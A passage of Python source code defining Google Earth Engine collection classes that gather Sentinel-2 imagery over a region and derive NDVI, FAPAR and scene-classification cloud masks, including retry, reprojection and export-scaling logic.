eeimagecollection.map(reproject)\n return eeimagecollection\n\n\n###############################################################################\n#\n# products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass GEECol(object):\n \"\"\"\n The 'GEECol' class represents specific ('product') collections of images. The class contains the information and algorithms\n needed to retrieve data from gee and calculate, convert... this data into the desired products for the specified region (roi).\n e.g. some ndvi-GEEProduct class should be able to collect the NIR and RED data for a specific sensor from gee,\n and apply some normalizedDifference algorithm on this data.\n \n The resulting products are expected to be exported eventually as timeseries for the specified roi.\n - In case of overlapping images -e.g. overlap of Sentinel 2 tiles- multiple images with identical\n timestamps can cover identical points.\n - In other cases -e.g. Sentinel 1- multiple images can cover different parts of the specified roi\n shortly after each other.\n To avoid these ambiguities in the product collections, images contributing to the specified roi\n are composited/mosaiced over daily intervals (probably thereby introducing more problems than solving).\n\n Until further notice we'll focus on \n - single-band (output) products\n - with minimum periodicity of 1 day\n\n GEECol <---+--- GEECol_s2ndvi\n +--- GEECol_s2fapar\n +--- GEECol_s2scl\n +--- GEECol_s2sclsimplemask\n +--- GEECol_s2sclconvmask\n +--- GEECol_s2sclcombimask\n +--- GEECol_s2sclclassfractions (test: one-image-collection)\n +--- GEECol_s2sclstaticsmask (test: one-image-collection)\n +--- GEECol_s2cloudlessmask (test: using S2_CLOUD_PROBABILITY)\n +--- GEECol_s2rgb (test)\n +--- GEECol_s1sigma0\n +--- GEECol_s1gamma0\n +--- GEECol_s1rvi (test)\n +--- GEECol_pv333ndvi\n +--- GEECol_pv333sm\n +--- GEECol_pv333simplemask\n +--- GEECol_pv333rgb\n +--- ...\n \"\"\"\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n - selects the ee.ImageCollection(s) needed to create the product\n - filters the collections to the specified roi and dates range\n - applies the product specific algorithm (e.g.: ndvi = (nir-red)/(nir+red))\n - applies mosaicing/compositing if needed:\n - e.g. in case of collections with tiled images where a roi intersects with multiple tiles (Sentinel-1)\n - e.g. in case of collections with overlapping images where points in the roi have multiple values (Sentinel-2)\n - uses a mosaicing/compositing algorithm type appropriate to the product (e.g.: ndvi and fapar typically 'max' composite)\n - assumes a minimum periodicity of 1 day for the output product, hence mosaicing/compositing is applied on images of the same date yyyymmdd\n - add collection properties describing this collection ('gee_description')\n - returns the product as single band ee.Imagecollection with distinct dates (excluding testcases and experiments)\n\n :param eeroi: ee.Geometry describing the region of interest (typically an ee.Geometry.Point or a ('square') ee.Geometry.Polygon)\n :param eedatefrom: ee.Date - earliest date included in the product\n :param eedatetill: ee.Date - earliest date NOT-included in the product\n :returns: ee.ImageCollection\n \"\"\"\n #\n # to be implemented by daughter\n #\n raise NotImplementedError(f\"{str(type(self).__name__)} - Subclasses should implement 'collect'!\")\n\n\n def scaleandflag(self, geecolimagecollection, verbose=False):\n \"\"\"\n scale, clamp, cast, ... : format the collection to be exported\n \n in case this product will be exported to file, this is recommended, otherwise masked areas\n will be exported as 0 (Export.image.toDrive) or -1 (Image.getDownloadUrl)\n regardless of its content (at least that is what we see now; ee version 0.1.248)\n \n in most normal cases - the GEEColl fully specified in its collect(...) - this should be done\n \n in special cases this might be avoided or postponed. \n e.g. when we want temporal max composite of an ndvi collection,\n in case no scaleandflag is applied, this can be done straight forward by filtering \n the collection into date ranges, and apply the max reducer (ee.ImageCollection.max())\n\n :param geecolimagecollection: ee.ImageCollection obtained from GEECol.collect\n :returns: ee.ImageCollection\n \"\"\"\n #\n # to be implemented by daughter\n #\n raise NotImplementedError(f\"{str(type(self).__name__)} - Subclasses should implement 'scaleandflag!'\")\n\n\n def getcollection(self, eedatefrom, eedatetill, eepoint, roipixelsindiameter, refcollection=None, refroipixelsdiameter=None, doscaleandflag=True, verbose=False):\n \"\"\"\n wrap _getcollection to allow some retries to avoid sporadic \"ee.ee_exception.EEException: Computation timed out.\"\n \"\"\"\n try:\n return geeutils.wrapretry(\n self._getcollection, \n args=(eedatefrom, eedatetill, eepoint, roipixelsindiameter),\n kwargs={'refcollection':refcollection, 'refroipixelsdiameter':refroipixelsdiameter, 'doscaleandflag':doscaleandflag, 'verbose':verbose},\n attempts=8, backoffseconds=60, backofffactor=2, verbose=verbose) # max 1 + 2 + ... + 64 = 127 minutes\n except geeutils.NoRetryException as e:\n #\n # arriving here is expected to indicate that some problem was explicitly caught\n # and classified as being not-solvable by retries, e.g. attempt to collect data\n # which does not exist in requested period or region.\n # we'll return 'None', so client can handle as some empty collection.\n #\n return None\n except:\n #\n # arriving here means we reached the limit of retries/backoffs. this could be caused\n # by some bug, or due to some service or resource not being available (even after \n # specified retries and backoffs). hence we can only pass the exception to the client\n #\n raise\n\n def _getcollection(self, eedatefrom, eedatetill, eepoint, roipixelsindiameter, refcollection=None, refroipixelsdiameter=None, doscaleandflag=True, verbose=False):\n \"\"\"\n determine reference roi (to obtain product patches congruent with reference product)\n determine reference projection (to obtain specified resolution)\n collect the specified ee.ImageCollection\n reproject and rescale this ee.ImageCollection\n add some properties to the resulting collection:\n - 'gee_refroi' : ee.Geometry - used as region parameter for exports\n - 'gee_centerpoint' : ee.Geometry.Point - debug\n - 'gee_projection' : ee.Projection - used to shrink the exported region a little, and to find the scale parameter for exports\n - 'gee_description' : string - used to brew filenames for exports\n \"\"\"\n\n #\n # find reference collection\n #\n if isinstance(refcollection, ee.ImageCollection):\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: reference collection specified as ee.ImageCollection\")\n _eerefimagecollection = refcollection\n elif isinstance(refcollection, GEECol): \n if verbose: print(f\"{str(type(self).__name__)}.getcollection: reference collection specified as {str(type(refcollection).__name__)}\")\n _eerefimagecollection = refcollection.collect(eepoint, eedatefrom, eedatetill, verbose=verbose)\n else:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: no reference collection specified - using self\")\n _eerefimagecollection = self.collect(eepoint, eedatefrom, eedatetill, verbose=verbose)\n #\n # _eerefimagecollection.size().getInfo() forces the collection to be evaluated\n # if this crashes during the evaluation, this might be retry-able\n # if the evaluation 'works', but results in an empty collection, all hope may be abandoned\n #\n if ( _eerefimagecollection.size().getInfo() == 0):\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: empty reference collection.\")\n raise geeutils.NoRetryEmptyCollectionException(f\"{str(type(self).__name__)}.getcollection: empty reference collection.\")\n #\n # find reference image - assume single band, or all bands having identical projection\n #\n _eerefimage = geeutils.someImageNear(_eerefimagecollection, eedatefrom, eepoint).select(0)\n try:\n #\n # this weird call is expected to throw in case no _eerefimage can be found \n # (e.g. due to an actual _eerefimagecollection outside the 'someImageNear' search range)\n # for strange reasons the _eerefimage will have type ee.Image, even if it is not there\n # and even then SOME calls will pass, while others will throw. \n #\n if (_eerefimage.bandNames().size().getInfo() > 0): pass\n except Exception as e:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: no reference image found. Exception: {str(e)}\")\n raise geeutils.NoRetryNoImageException(f\"{str(type(self).__name__)}.getcollection: no reference image found.\")\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selected reference image:\\n{geeutils.szprojectioninfo(_eerefimage)} id:{_eerefimage.id().getInfo()}\")\n\n #\n # find roi center\n #\n if refroipixelsdiameter is not None:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: specified roi diameter in reference collection pixels: {refroipixelsdiameter}\")\n pass # roi size in pixels of reference collection\n else:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: no roi diameter in reference collection pixels specified (using destination roi diameter: {roipixelsindiameter})\")\n refroipixelsdiameter = roipixelsindiameter # self acting as reference\n \n _refroipixelsdiameter = round(refroipixelsdiameter) # \"an integer\" I said.\n _refroipixelsdiameter = max(_refroipixelsdiameter, 1) # preferably larger then 1\n if verbose and (_refroipixelsdiameter != refroipixelsdiameter):\n print(f\"{str(type(self).__name__)}.getcollection: specified roi diameter in reference collection pixels ({refroipixelsdiameter}) modified to {_refroipixelsdiameter}\")\n\n if (_refroipixelsdiameter %2) == 0: # even diameter\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selecting roi center at reference collection pixels raster intersection\")\n _eeroicenterpoint = geeutils.pixelinterspoint(eepoint, _eerefimage) # roi center on refimage pixels intersection\n else: # odd diameter\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selecting roi center at reference collection pixel center\")\n _eeroicenterpoint = geeutils.pixelcenterpoint(eepoint, _eerefimage) # roi center on refimage pixel center\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selected roi center:\\n{geeutils.szgeometryinfo(_eeroicenterpoint)}\")\n #\n # find actual roi - roi radius for odd sizes: 1, 2, 3, ... - for even sizes: 0.5, 1.5, 2.5, ...\n #\n _eerefroi = geeutils.squarerasterboundsroi(_eeroicenterpoint, _refroipixelsdiameter/2, _eerefimage, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selected roi:\\n{geeutils.szgeometryinfo(_eerefroi)}\")\n #\n # find roi origin to translate to, to align pixel boundaries with reference roi\n #\n _eerefroiulx = _eerefroi.coordinates().flatten().get(0)\n _eerefroiuly = _eerefroi.coordinates().flatten().get(1)\n #\n # translate and scale reference projection to obtain target projection\n #\n _roipixelsindiameter = round(roipixelsindiameter) # \"an integer\" I said.\n _roipixelsindiameter = max(_roipixelsindiameter, 1) # preferably larger then 1\n if verbose and (_roipixelsindiameter != roipixelsindiameter):\n print(f\"{str(type(self).__name__)}.getcollection: specified roi diameter in destination collection pixels ({roipixelsindiameter}) modified to {_roipixelsindiameter}\")\n \n _eedstprojection = _eerefimage.projection().translate(_eerefroiulx, _eerefroiuly)\n _eedstprojection = _eedstprojection.scale(_refroipixelsdiameter/_roipixelsindiameter, _refroipixelsdiameter/_roipixelsindiameter)\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: destination projection roi:\\n{geeutils.szprojectioninfo(_eedstprojection)}\")\n #\n # find native image collection\n #\n _eenatimagecollection = self.collect(_eerefroi, eedatefrom, eedatetill, verbose=verbose)\n #\n # _eenatimagecollection.size().getInfo() forces the collection to be evaluated\n # if this crashes during the evaluation, this might be retry-able\n # if the evaluation 'works', but results in an empty collection, all hope may be abandoned\n #\n if ( _eenatimagecollection.size().getInfo() == 0):\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: empty destination collection.\")\n raise geeutils.NoRetryEmptyCollectionException(f\"{str(type(self).__name__)}.getcollection: empty destination collection.\")\n #\n # reproject it, to align pixel boundaries with reference roi, in resolution specified by roipixelsindiameter\n #\n _eedstimagecollection = self._reproject(_eenatimagecollection, _eedstprojection, verbose=verbose)\n #\n # apply scaling, clipping, masking,... preparing the collection for export\n #\n if doscaleandflag:\n _eedstimagecollection = self.scaleandflag(_eedstimagecollection, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: scaled collection: {geeutils.szimagecollectioninfo(_eedstimagecollection)}\")\n #\n # add some collection properties (e.g. used during export)\n #\n _eedstimagecollection = _eedstimagecollection.set('gee_refroi', _eerefroi)\n _eedstimagecollection = _eedstimagecollection.set('gee_centerpoint', _eeroicenterpoint)\n _eedstimagecollection = _eedstimagecollection.set('gee_projection', _eedstprojection)\n if verbose: \n print(f\"{str(type(self).__name__)}.getcollection: set 'gee_refroi' to: \\n{geeutils.szgeometryinfo(_eerefroi)}\")\n print(f\"{str(type(self).__name__)}.getcollection: set 'gee_projection' to: \\n{geeutils.szprojectioninfo(_eedstprojection)}\")\n #\n #\n #\n if True:\n #\n # store intermediates so client can retrieve them for debugging\n #\n self._eerefimagecollection = _eerefimagecollection\n self._eerefimage = _eerefimage\n self._refroipixelsdiameter = _refroipixelsdiameter\n self._eeroicenterpoint = _eeroicenterpoint\n self._eerefroi = _eerefroi\n self._eerefroiulx = _eerefroiulx\n self._eerefroiuly = _eerefroiuly\n self._roipixelsindiameter = _roipixelsindiameter\n self._eedstprojection = _eedstprojection\n self._eenatimagecollection = _eenatimagecollection\n self._eedstimagecollection = _eedstimagecollection\n #\n #\n #\n return _eedstimagecollection\n\n\n###############################################################################\n#\n# Sentinel 2 related products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass S2sclcppfilter(geemask.IColFilter):\n \"\"\"\n simple filter for sentinel 2 collections, based on scene classification.\n default settings emulate some 'cloudy pixel percentage' filter: maximum 95% pixels have SCL class 8,9 or 10\n typical use in the collect method of sentinel 2 products (GEECol daughter classes)\n \"\"\"\n def __init__(self, s2sclclassesarray=[8,9,10], thresholdpct=-95):\n \"\"\"\n :param s2sclclassesarray: list (python list, NOT ee.List) of the SCL class values to be evaluated\n :param thresholdpct: the minimum (positive thresholds) or maximum (negative thresholds) percentage coverage by these classes ( [-100..100] )\n \"\"\"\n self.filter = geemask.SimpleFilter('SCL', s2sclclassesarray, thresholdpct)\n\n def filtercollection(self, eeimagecollection, eeregion, verbose=False):\n \"\"\"\n :param eeimagecollection: sentinel 2 ee.ImageCollection to be filtered (MUST CONTAIN SCL BAND)\n :param eeregion: region to be evaluated by the filter (would be nice if the eeimagecollection actually covers this region...)\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}.filtercollection: input collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n eeimagecollection = self.filter.filtercollection(eeimagecollection, eeregion, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.filtercollection: resulting collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2ndvi(GEECol, OrdinalProjectable):\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['B4', 'B8', 'SCL']) # B4~Red B8~Nir - SCL to allow SCL-based filters\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply ndvi = (nir-red)/(nir+red)\n #\n def ndvi(image):\n return ((image.select('B8').subtract(image.select('B4'))).divide(image.select('B8').add(image.select('B4')))\n .rename('NDVI')\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(ndvi)\n #\n # apply maximum composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2ndvi')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .clamp(-1,1) # clamp looses properties \n .toFloat() # should be obsolete here, but side effect is no-data as -inf or nan iso 0\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\nGEECol_s2ndvi with historical vito ndvi scaling\n\"\"\"\nclass GEECol_s2ndvi_he(GEECol_s2ndvi):\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n return super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose).set('gee_description', 'S2ndvi_he')\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n #\n # historical vito ndvi scaling [ -0.08, 0.92 ] -> [0, 250] with 255 as no-data\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .add(0.08).multiply(250).clamp(0,250)\n .unmask(255, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection \n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2fapar(GEECol, OrdinalProjectable):\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n # beware: apparently the collection contains some images with missing properties\n # e.g. ee.Image('COPERNICUS/S2_SR/20190117T061209_20190117T061411_T42TVK')\n #\n # geebiopar.get_s2fapar3band expects 'MEAN_INCIDENCE_ZENITH_ANGLE_B8', 'MEAN_SOLAR_ZENITH_ANGLE', \n # 'MEAN_SOLAR_AZIMUTH_ANGLE' and 'MEAN_INCIDENCE_AZIMUTH_ANGLE_B8' to be available,\n # hence the additional \"notNull\" filter\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['B3', 'B4', 'B8', 'SCL'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill))\n .filter(ee.Filter.notNull(['MEAN_INCIDENCE_ZENITH_ANGLE_B8', 'MEAN_SOLAR_ZENITH_ANGLE', 'MEAN_SOLAR_AZIMUTH_ANGLE', 'MEAN_INCIDENCE_AZIMUTH_ANGLE_B8'])))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply fapar network\n #\n def fapar(image):\n return (geebiopar.get_s2fapar3band(image)\n .rename('FAPAR')\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(fapar)\n #\n # apply maximum composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2fapar')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .clamp(0,1) # clamp looses properties \n .toFloat() # otherwise would be double (Float64)\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\nGEECol_s2fapar with historical vito fapar scaling\n\"\"\"\nclass GEECol_s2fapar_he(GEECol_s2fapar):\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n return super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose).set('gee_description', 'S2fapar_he')\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n #\n # historical vito fapar scaling [ 0, 1 ] -> [0, 200] with 255 as no-data\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .multiply(200).clamp(0,200)\n .unmask(255, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection \n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2scl(GEECol, CategoricalProjectable):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S2_SR\n \n Scene Classification Map (The \"No Data\" value of 0 is masked out)\n 1 ff0004 Saturated or defective\n 2 868686 Dark Area Pixels\n 3 774b0a Cloud Shadows\n 4 10d22c Vegetation\n 5 ffff52 Bare Soils\n 6 0000ff Water\n 7 818181 Clouds Low Probability / Unclassified\n 8 c0c0c0 Clouds Medium Probability\n 9 f1f1f1 Clouds High Probability\n 10 bac5eb Cirrus\n 11 52fff9 Snow / Ice\n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['SCL'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply mode composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"mode\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2scl')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting these images, we'll mask the empty area with 0 - being the SCENE CLASSIFICATION NO-DATA value\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(0, False) # no data to 0 \n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclsimplemask(GEECol_s2scl):\n \"\"\"\n remark: \n - original CropSar focused on Belgium. In Belgium snow is rare.\n - scl is not perfect. e.g. in the region of ee.Geometry.Point( 5.3564, 51.3369) there are snow-pixels (class 11) on 2018-07-12 (summer).\n - therefore scl-snow was been masked by default.\n - current codes continuing mission: to explore strange new places, to seek out new training and new evaluation samples, to boldly go where no CropSar has gone before.\n - hence, we'll consider class 11 to be one of the good guys by default.\n \"\"\"\n def __init__(self, s2sclclassesarray=None, binvert=None, colfilter=None):\n \"\"\"\n \"\"\"\n super().__init__(colfilter)\n\n if s2sclclassesarray is None:\n #s2sclclassesarray = [2, 4, 5, 6, 7] # assuming 2,4,5,6 en 7 to be 'valid' classification classes (unlike 'volatile' clouds, saturations, snow,...)\n s2sclclassesarray = [2, 4, 5, 6, 7, 11]\n if binvert is None:\n binvert = True\n \n self.maskmaker = geemask.SimpleMask(s2sclclassesarray, binvert)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection: SCL from parent - already composited (daily) to avoid striping at overlaps\n #\n eeimagecollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n def simplemask(image):\n return (self.maskmaker\n .makemask(image)\n .toUint8() # uint8 [0:not masked, 1:masked] (obsolete ?)\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n eeimagecollection = eeimagecollection.map(simplemask)\n #\n # no mosaic/composite - already done in base collection\n #\n pass\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2sclsimplemask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclconvmask(GEECol_s2scl):\n \"\"\"\n \"\"\"\n def __init__(self, lsts2sclclassesarray=None, lstwindowsizeinmeters=None, lstthreshold=None, colfilter=None):\n \"\"\"\n \"\"\"\n super().__init__(colfilter)\n\n if lsts2sclclassesarray is None:\n #lsts2sclclassesarray = [[2, 4, 5, 6, 7], [3, 8, 9, 10, 11]]\n lsts2sclclassesarray = [[2, 4, 5, 6, 7, 11], [3, 8, 9, 10]]\n if lstwindowsizeinmeters is None:\n lstwindowsizeinmeters = [20*9, 20*101]\n if lstthreshold is None:\n lstthreshold = [-0.057, 0.025]\n \n self.maskmaker = geemask.ConvMask(lsts2sclclassesarray, lstwindowsizeinmeters, lstthreshold)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection: SCL from parent - already composited (daily) to avoid striping at overlaps\n #\n eeimagecollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n def convmask(image):\n return (self.maskmaker\n .makemask(image)\n .toUint8() # uint8 [0:not masked, 1:masked] (obsolete ?)\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n eeimagecollection = eeimagecollection.map(convmask)\n #\n # no mosaic/composite - already done in base collection\n #\n pass\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2sclconvmask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclstaticsmask(GEECol_s2scl):\n\n def __init__(self, s2sclclassesarray=None, threshold=None, thresholdunits=None, statisticsareametersradius=None):\n \"\"\"\n :param s2sclclassesarray: list of s2 scl classes\n :param thresholdunits: \"sigma\", \"percentage\" or \"percentile\" - defaults to \"sigma\" \n :param threshold: threshold value. can be absolute percentage or based on regional statistics\n - thresholdunits: \"sigma\": +/- ]0,4] - mask if frequency >= mean + threshold * sigma or frequency <= mean - abs(threshold) * sigma\n - thresholdunits: \"percentile\": +/- [1,100] - mask if frequency >= percentile(threshold) or frequency < percentile(abs(threshold))\n - thresholdunits: \"percentage\": +/- [1,100] - mask if frequency >= threshold or frequency < abs(threshold)\n (using values [1,100] to avoid confusion between fractions and percentages)\n :param statisticsareametersradius: (only for thresholdunits=\"sigma\" or \"percentile\") \n - specifies the region over which the percentile or mean and sigma will be calculated\n - actual area is square with radius statisticsareametersradius\n - this area is assumed to be \"large\" with respect to the actual target region (in .collect)\n \"\"\"\n #\n # super (GEECol_s2scl) WITHOUT filter\n #\n super().__init__(colfilter=None)\n #\n # s2sclclassesarray\n #\n if s2sclclassesarray is None: \n #self.s2sclclassesarray = [3,8,9,10,11] # default: in clouds we trust, ... and snow?\n self.s2sclclassesarray = [3,8,9,10]\n else:\n if not isinstance(s2sclclassesarray, list) : raise ValueError(\"s2sclclassesarray expected to be a list\")\n for number in s2sclclassesarray:\n if not isinstance(number, numbers.Number) : raise ValueError(\"s2sclclassesarray expected to be a list of integers\")\n if not (0 <= number <= 11) : raise ValueError(\"ridicule s2 scl class value (expected [0,11])\")\n \n self.s2sclclassesarray = s2sclclassesarray\n\n #\n # thresholdunits\n #\n if thresholdunits is None: \n self.thresholdunits = \"sigma\" # default: threshold based on regional statistics\n else:\n if not thresholdunits in [\"percentage\", \"sigma\", \"percentile\"] : raise ValueError(\"thresholdunits expected to be 'percentage', 'sigma' or 'percentile'\")\n self.thresholdunits = thresholdunits\n\n #\n # threshold\n #\n if self.thresholdunits == \"sigma\":\n if threshold is None:\n self.threshold = 2 # default: strict - lose only about 2.1 % (assuming a normal distribution)\n else:\n if not isinstance(threshold, numbers.Number) : raise ValueError(\"invalid threshold\")\n if not (0 < abs(threshold) <= 4) : raise ValueError(\"ridicule (stdev) threshold value (expected ]0,4])\")\n self.threshold = threshold\n \n else:\n if threshold is not None:\n if not isinstance(threshold, numbers.Number) : raise ValueError(\"invalid threshold\")\n if not (1 <= abs(threshold) <= 100) : raise ValueError(\"invalid threshold value (expected +/- [1, 100]\")\n self.threshold = threshold\n else:\n if self.thresholdunits == \"percentage\":\n self.threshold = 70 # default for \"percentage\"\n else:\n self.threshold = 98 # default for \"percentile\"\n\n\n #\n # regional statistics area\n #\n if self.thresholdunits == \"percentage\":\n self.metersradius = 0 # not used with absolute thresholds \n else:\n if statisticsareametersradius is None:\n self.metersradius = 25000 # default: about a quarter of typical s2 tile ( which is 100km x 100km )\n else:\n if not isinstance(statisticsareametersradius, numbers.Number) : raise ValueError(\"invalid statisticsareametersradius\")\n if ( statisticsareametersradius < 500) : raise ValueError(\"ridicule statisticsareametersradius value (expected min 500)\")\n self.metersradius = statisticsareametersradius\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n #\n #\n if verbose: print(f\"{str(type(self).__name__)}.collect: threshold({self.threshold} {self.thresholdunits}) area({self.metersradius} radius)\")\n #\n # daily mosaiced scl collection\n #\n eesclimgcollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n if self.thresholdunits != \"percentage\": eestatisticsregion = geeutils.squareareaboundsroi(eeroi.centroid(maxError=0.001), self.metersradius)\n else: eestatisticsregion = None\n #\n #\n #\n staticsmask = ( ee.Image(geemask.StaticsMask(\n self.s2sclclassesarray, \n None, \n self.threshold, \n self.thresholdunits, \n eestatisticsregion, \n verbose=verbose)\n .makemask(eesclimgcollection)\n .toUint8() # uint8 [0:not masked, 1:masked] (obsolete ?)\n .rename('STATICS')\n .copyProperties(eesclimgcollection.first(), ['system:time_start', 'gee_date'])))\n #\n # make (single image) collection and add properties describing this collection\n # \n szdescription = \"S2sclstaticsmask(\" + str(self.threshold) + self.thresholdunits + \")\"\n eeimagecollection = ee.ImageCollection(staticsmask).set('gee_description', szdescription)\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n 